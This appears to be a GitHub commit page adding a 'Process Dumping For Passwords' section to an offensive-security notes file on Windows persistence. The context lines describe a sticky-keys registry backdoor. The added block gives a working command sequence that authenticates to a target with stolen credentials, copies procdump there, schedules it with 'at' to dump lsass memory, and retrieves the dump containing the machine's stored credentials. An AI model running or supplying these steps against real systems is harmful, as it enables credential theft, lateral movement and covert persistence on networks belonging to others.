Skip to content

Commit c297085

Browse files
committed
Add in Process Dumping Info
Add in info on how to use procdump.exe on lsass to obtain a memory dump containing all of the stored credentials on the local machine.
1 parent 38ede6b commit c297085

File tree

1 file changed

+14
-0
lines changed

1 file changed

+14
-0
lines changed

persistence/windows/general.md

Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -171,3 +171,17 @@ This technique uses registry entries to switch the binary that the sticky keys e
171171
* For the "Debugger" REG_SZ, make it have a value of your binary
172172

173173
* Press SHIFT 5 times and your binary should be executed
174+
175+
### Process Dumping For Passwords
176+
If you have access to a server and one of the user's usernames and passwords and can create shares on that computer,
177+
you may be able to create a scheduled task which runs procdump.exe to dump all of the memory of the lsass process,
178+
thus gaining access to all of the stored credentials on the targeted computer:
179+
180+
```
181+
net use \\target server /user:DOM\username password
182+
copy procdump.exe \\targetserver\c$
183+
copy procdump.bat \\targetserver\c$
184+
procdump.exe -ma lsass creds.dump
185+
at \\targetserver 13:37 C:\procdump.bat
186+
copy \\targetserver\c$\targetserver.dmp .
187+
```

0 commit comments

Comments
 (0)